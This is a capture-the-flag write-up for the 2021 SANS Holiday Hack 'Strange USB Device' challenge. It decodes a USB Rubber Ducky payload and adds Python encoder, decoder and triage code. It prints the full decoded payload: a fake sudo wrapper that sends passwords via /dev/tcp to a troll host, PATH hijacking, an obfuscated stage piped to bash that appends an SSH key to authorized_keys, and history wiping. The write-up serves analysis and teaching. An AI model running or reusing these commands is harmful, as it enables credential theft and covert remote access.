Objective 5: Strange USB Device - 2021 SANS Holiday Hack Challenge
In this challenge, we do some light reverse engineering on a USB Rubber Ducky payload.
Play the 2021 SANS Holiday Hack Challenge
Objective
Assist the elves in reverse engineering the strange USB device.
A random USB device, oh what could be the matter? It seems a troll has left this, right on a silver platter. Oh my friend I need your ken, this does not smell of attar. Help solve this challenge quick quick, I shall offer no more natter.
Evaluate the USB data in /mnt/USBDEVICE.
The top of the terminal asks for the username of the troll involved with this attack.
There’s also a talk on this that’s pretty critical: HIDden Ducky, Deconstructed Payload
The Challenge
In short, the talk explains that USB Rubber Duckies are scripted in a language called DuckyScript. The script gets encoded into a binary (called inject.bin) and placed on the SD card in the Rubber Ducky; when plugged in, the device presents itself as a keyboard and types the payload out.
The presenter, Kevin Tyers, has written a Python script called Mallard that decodes these inject.bin files back into DuckyScript.
Running “ls -la” from the home directory reveals that this script is already pre-loaded in the challenge terminal.
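To make the encoding concrete, here is a small encoder and decoder for the classic inject.bin layout. This is an added example, not Mallard’s code and not anything shipped with the challenge. It assumes the layout used by the original Hak5 Duck Encoder as I understand it: every instruction is a two-byte pair of HID keycode and modifier byte, and a DELAY is a [0x00, ms] pair repeated in 255 ms chunks. The key table, the STRING/ENTER/DELAY/GUI subset and the sample script are this example’s own.

```python
# Added example, not Mallard and not code from the challenge: a minimal encoder
# and decoder for the classic inject.bin layout. Assumed layout (that of the
# original Hak5 Duck Encoder): every instruction is a two-byte pair
# [HID keycode, modifier]; DELAY is a [0x00, ms] pair repeated in 255 ms chunks.
import string

HID_ENTER, HID_SPACE = 0x28, 0x2C
MOD_LSHIFT, MOD_LGUI = 0x02, 0x08

# Unshifted US-layout characters -> keyboard-page usage ID (a=0x04 .. z=0x1D,
# 1=0x1E .. 9=0x26, 0=0x27, then the punctuation keys).
_PLAIN = {c: 0x04 + i for i, c in enumerate(string.ascii_lowercase)}
_PLAIN.update({c: 0x1E + i for i, c in enumerate("123456789")})
_PLAIN.update({"0": 0x27, " ": HID_SPACE, "-": 0x2D, "=": 0x2E, "[": 0x2F,
               "]": 0x30, "\\": 0x31, ";": 0x33, "'": 0x34, "`": 0x35,
               ",": 0x36, ".": 0x37, "/": 0x38})
# Shifted characters -> the unshifted character on the same key.
_SHIFTED = dict(zip(string.ascii_uppercase, string.ascii_lowercase))
_SHIFTED.update(dict(zip("!@#$%^&*()", "1234567890")))
_SHIFTED.update({"_": "-", "+": "=", "{": "[", "}": "]", "|": "\\", ":": ";",
                 '"': "'", "~": "`", "<": ",", ">": ".", "?": "/"})
_PAIR_TO_CHAR = {(code, 0x00): ch for ch, code in _PLAIN.items()}
_PAIR_TO_CHAR.update({(_PLAIN[low], MOD_LSHIFT): up for up, low in _SHIFTED.items()})


def char_to_pair(ch):
    """One typed character -> bytes([keycode, modifier])."""
    if ch in _PLAIN:
        return bytes([_PLAIN[ch], 0x00])
    if ch in _SHIFTED:
        return bytes([_PLAIN[_SHIFTED[ch]], MOD_LSHIFT])
    raise ValueError(f"unsupported character {ch!r}")


def encode(script):
    """DuckyScript (STRING/ENTER/DELAY/GUI subset) -> inject.bin bytes."""
    out = bytearray()
    for line in script.splitlines():
        cmd, _, arg = line.strip().partition(" ")
        if not cmd:
            continue
        if cmd == "STRING":
            out += b"".join(char_to_pair(ch) for ch in arg)
        elif cmd == "ENTER":
            out += bytes([HID_ENTER, 0x00])
        elif cmd == "DELAY":                 # long delays become several 255 ms chunks
            ms = int(arg)
            while ms > 0:
                out += bytes([0x00, min(ms, 255)])
                ms -= 255
        elif cmd == "GUI":                   # GUI SPACE, GUI -, GUI q ...
            key = HID_SPACE if arg == "SPACE" else _PLAIN[arg.lower()]
            out += bytes([key, MOD_LGUI])
        else:
            raise ValueError(f"unsupported command {cmd!r}")
    return bytes(out)


def decode(blob):
    """inject.bin bytes -> DuckyScript text. Consecutive characters are merged
    into one STRING and delay chunks are summed, the way Mallard's output reads."""
    if len(blob) % 2:
        raise ValueError("inject.bin should be an even number of bytes")
    lines, text, delay = [], "", 0

    def flush():
        nonlocal text, delay
        if text:
            lines.append("STRING " + text)
        if delay:
            lines.append(f"DELAY {delay}")
        text, delay = "", 0

    for key, mod in zip(blob[0::2], blob[1::2]):
        if key == 0x00:                               # DELAY chunk
            if text:
                flush()
            delay += mod
        elif (key, mod) in _PAIR_TO_CHAR:             # a typed character
            if delay:
                flush()
            text += _PAIR_TO_CHAR[(key, mod)]
        else:
            flush()
            if (key, mod) == (HID_ENTER, 0x00):
                lines.append("ENTER")
            elif mod == MOD_LGUI and (key, 0x00) in _PAIR_TO_CHAR:
                lines.append("GUI " + ("SPACE" if key == HID_SPACE else _PAIR_TO_CHAR[(key, 0x00)]))
            else:                                     # never drop unknown pairs silently
                lines.append(f"UNKNOWN 0x{key:02x} 0x{mod:02x}")
    flush()
    return "\n".join(lines)


# Constructed sample shaped like the start of the payload (not the real inject.bin).
SAMPLE_SCRIPT = """DELAY 500
GUI SPACE
STRING terminal
ENTER
GUI -
STRING mkdir -p ~/.config/sudo
ENTER
GUI q"""
```

Calling decode(open("/mnt/USBDEVICE/inject.bin", "rb").read()) gives a Mallard-style listing. Any pair that is not in the small key table comes out as an UNKNOWN line rather than being skipped, which is what you want when triaging a payload that may use keys you did not anticipate.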
First, let’s just check out that “/mnt/USBDEVICE” directory:
cd /mnt/USBDEVICE
ls -la
This gives us:
total 12
drwxr-xr-x 1 root root 4096 Dec 3 16:25 ./
drwxr-xr-x 1 root root 4096 Dec 3 16:25 ../
-rw-r--r-- 1 root root 2090 Nov 30 22:14 inject.bin
So inject.bin is there, where we would expect it.
Let’s head back to the home directory and run Mallard against it.
cd ~
python3 mallard.py --file /mnt/USBDEVICE/inject.bin
This spits out the DuckyScript for the file:
ENTER
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
ENTER
DELAY 500
GUI -
GUI -
GUI -
GUI -
GUI -
STRING /bin/bash
ENTER
DELAY 500
STRING mkdir -p ~/.config/sudo
ENTER
DELAY 200
STRING echo '#!/bin/bash > ~/.config/sudo/sudo
ENTER
STRING /usr/bin/sudo $@
ENTER
STRING echo -n "[sudo] password for $USER: "
ENTER
STRING read -s pwd
ENTER
STRING echo
ENTER
STRING echo "$pwd" | /usr/bin/sudo -S true 2>/dev/null
ENTER
STRING if [ $? -eq 1 ]
ENTER
STRING then
ENTER
STRING echo "$USER:$pwd:invalid" > /dev/tcp/trollfun.jackfrosttower.com/1337
ENTER
STRING echo "Sorry, try again."
ENTER
STRING sudo $@
ENTER
STRING else
ENTER
STRING echo "$USER:$pwd:valid" > /dev/tcp/trollfun.jackfrosttower.com/1337
ENTER
STRING echo "$pwd" | /usr/bin/sudo -S $@
ENTER
STRING fi
ENTER
STRING fi' > ~/.config/sudo/sudo
ENTER
DELAY 200
STRING chmod u+x ~/.config/sudo/sudo
ENTER
DELAY 200
STRING echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
ENTER
DELAY 200
STRING echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
ENTER
DELAY 200
STRING echo ==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92YuIXZ39Gd0N3byZ2ajFmau4WdmxGbvJHdAB3bvd2Ytl3ajlGILFESV1mWVN2SChVYTp1VhNlRyQ1UkdFZopkbS1EbHpFSwdlVRJlRVNFdwM2SGVEZnRTaihmVXJ2ZRhVWvJFSJBTOtJ2ZV12YuVlMkd2dTVGb0dUSJ5UMVdGNXl1ZrhkYzZ0ValnQDRmd1cUS6x2RJpHbHFWVClHZOpVVTpnWwQFdSdEVIJlRS9GZyoVcKJTVzwWMkBDcWFGdW1GZvJFSTJHZIdlWKhkU14UbVBSYzJXLoN3cnAyboNWZ | rev | base64 -d | bash
ENTER
DELAY 600
STRING history -c && rm .bash_history && exit
ENTER
DELAY 600
GUI q
There’s no apparent username yet, but it’s worth reading what the typed commands do before chasing it. The script opens a terminal and drops a fake sudo wrapper in ~/.config/sudo: it prints the usual “[sudo] password for $USER:” prompt, reads the password, ships “$USER:$pwd” (tagged valid or invalid) to trollfun.jackfrosttower.com on port 1337 through /dev/tcp, and then passes the password on to the real /usr/bin/sudo so the victim sees nothing odd. It prepends that directory to PATH in both ~/.bash_profile and ~/.bashrc so the wrapper shadows the real binary in every new shell, runs a second stage hidden in that giant base64 string, and wipes the shell history on the way out. Putting that echo command (without the | bash) into our own terminal outputs the following:
echo 'ssh-rsa UmN5RHJZWHdrSHRodmVtaVp0d1l3U2JqZ2doRFRHTGRtT0ZzSUZNdyBUaGlzIGlzIG5vdCByZWFsbHkgYW4gU1NIIGtleSwgd2UncmUgbm90IHRoYXQgbWVhbi4gdEFKc0tSUFRQVWpHZGlMRnJhdWdST2FSaWZSaXBKcUZmUHAK ickymcgoop@trollfun.jackfrosttower.com' >> ~/.ssh/authorized_keys
Looks like we have an SSH public key being appended to ~/.ssh/authorized_keys, which would give the troll key-based SSH access to the box. The comment field on the key gives the username: ickymcgoop.
Answer: ickymcgoop
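Rather than eyeballing the decoded script, the same triage can be scripted. The block below is an added example, not part of this writeup and not Mallard: it rebuilds the shell text from the STRING and ENTER lines, decodes any echo | rev | base64 -d stage the way we just did by hand, and reports the indicators that matter in this payload (exfil destinations written through /dev/tcp, directories prepended to PATH, the user@host comment on a key appended to authorized_keys, and history wiping). The function and indicator names and the regexes are this example’s own; the sample is assembled from lines of the decoded payload above, and the blob is the one that payload carries.

```python
# Added example, not part of the writeup or of Mallard: triage the shell text a
# decoded DuckyScript types. Indicator names and regexes are this example's own.
import base64
import re


def typed_shell(ducky):
    """Concatenate STRING lines in order, turning ENTER into a newline.
    DELAY and GUI lines produce no text and are skipped."""
    parts = []
    for line in ducky.splitlines():
        cmd, _, arg = line.partition(" ")
        if cmd == "STRING":
            parts.append(arg)
        elif cmd == "ENTER":
            parts.append("\n")
    return "".join(parts)


# 'echo <base64 written backwards> | rev | base64 -d', as this payload does it.
REV_B64 = re.compile(
    r"echo\s+(?:-n\s+)?([A-Za-z0-9+/=]{16,})\s*\|\s*rev\s*\|\s*base64\s+(?:-d|--decode)")
DEV_TCP = re.compile(r"/dev/(?:tcp|udp)/([A-Za-z0-9.\-]+)/(\d+)")
PATH_PREPEND = re.compile(r'PATH=["\']?((?:~|\$HOME)[^:"\']*):\$PATH')
AUTH_KEY_COMMENT = re.compile(r"(\S+@\S+?)'?\s*>>\s*~/\.ssh/authorized_keys")
HISTORY_WIPE = re.compile(r"history\s+-c|rm\s+\S*\.bash_history")


def deobfuscate(shell):
    """Plaintext of every rev-then-base64 stage found in the typed shell."""
    stages = []
    for m in REV_B64.finditer(shell):
        raw = base64.b64decode(m.group(1)[::-1])   # undo 'rev', then base64
        stages.append(raw.decode("utf-8", "replace"))
    return stages


def triage(ducky):
    """Indicators from the typed shell plus every decoded stage."""
    shell = typed_shell(ducky)
    stages = deobfuscate(shell)
    scope = "\n".join([shell] + stages)            # scan decoded stages too
    return {
        "exfil": sorted({f"{h}:{p}" for h, p in DEV_TCP.findall(scope)}),
        "path_prepend": sorted(set(PATH_PREPEND.findall(scope))),
        "ssh_key_comments": sorted(set(AUTH_KEY_COMMENT.findall(scope))),
        "history_wipe": bool(HISTORY_WIPE.search(scope)),
        "decoded_stages": stages,
    }


# Sample assembled from lines of the decoded payload above; the blob is the one
# the payload carries. Not a full copy of the script.
SAMPLE = """STRING mkdir -p ~/.config/sudo
ENTER
DELAY 200
STRING echo "$USER:$pwd:invalid" > /dev/tcp/trollfun.jackfrosttower.com/1337
ENTER
STRING echo "$USER:$pwd:valid" > /dev/tcp/trollfun.jackfrosttower.com/1337
ENTER
STRING echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
ENTER
STRING echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
ENTER
STRING echo ==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92YuIXZ39Gd0N3byZ2ajFmau4WdmxGbvJHdAB3bvd2Ytl3ajlGILFESV1mWVN2SChVYTp1VhNlRyQ1UkdFZopkbS1EbHpFSwdlVRJlRVNFdwM2SGVEZnRTaihmVXJ2ZRhVWvJFSJBTOtJ2ZV12YuVlMkd2dTVGb0dUSJ5UMVdGNXl1ZrhkYzZ0ValnQDRmd1cUS6x2RJpHbHFWVClHZOpVVTpnWwQFdSdEVIJlRS9GZyoVcKJTVzwWMkBDcWFGdW1GZvJFSTJHZIdlWKhkU14UbVBSYzJXLoN3cnAyboNWZ | rev | base64 -d | bash
ENTER
STRING history -c && rm .bash_history && exit
ENTER"""

if __name__ == "__main__":
    for k, v in triage(SAMPLE).items():
        print(k, "=>", v)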